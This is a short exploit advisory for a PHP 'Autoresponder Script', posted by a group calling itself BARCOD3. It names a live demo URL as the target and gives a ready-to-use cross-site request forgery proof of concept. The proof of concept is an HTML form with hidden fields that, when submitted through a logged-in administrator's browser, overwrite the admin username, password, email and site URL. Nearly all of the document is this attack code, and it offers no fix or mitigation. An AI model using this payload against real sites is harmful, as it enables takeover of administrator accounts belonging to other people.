< ------------------- header data start ------------------- >


#############################################################

# Application Name : Autoresponder Script

# Vulnerable Type : XSRF

# Infection : Administrator Profile Bilgileri Change Edilebilir.

# author : BARCOD3 - Bug Researchers

# Demo : http://www.downlinegoldmine.com/autoresponder/admin.php

# Home : ozkanbozkurt.com

#############################################################


< ------------------- header data end of ------------------- >


< -- bug code start -- >
<h3>BARCOD3</h3>
<form action=’victim.org/patch/admin.php’ method=post>
<input type=hidden name=id value=1>
<input type=hidden name=edit value=1>
<input type=hidden name=asitename value=’SITENAME’>
<input type=hidden name=asiteurl value=’OZKANBOZKURT.COM’>
<input type=hidden name=aemail value=’[email protected]’>
<input type=hidden name=ausername value=’username’>
<input type=hidden name=apassword value=’passWORD’>
<input type=Submit name=b value=’update Settings’>
</form>
< -- bug code end of -- >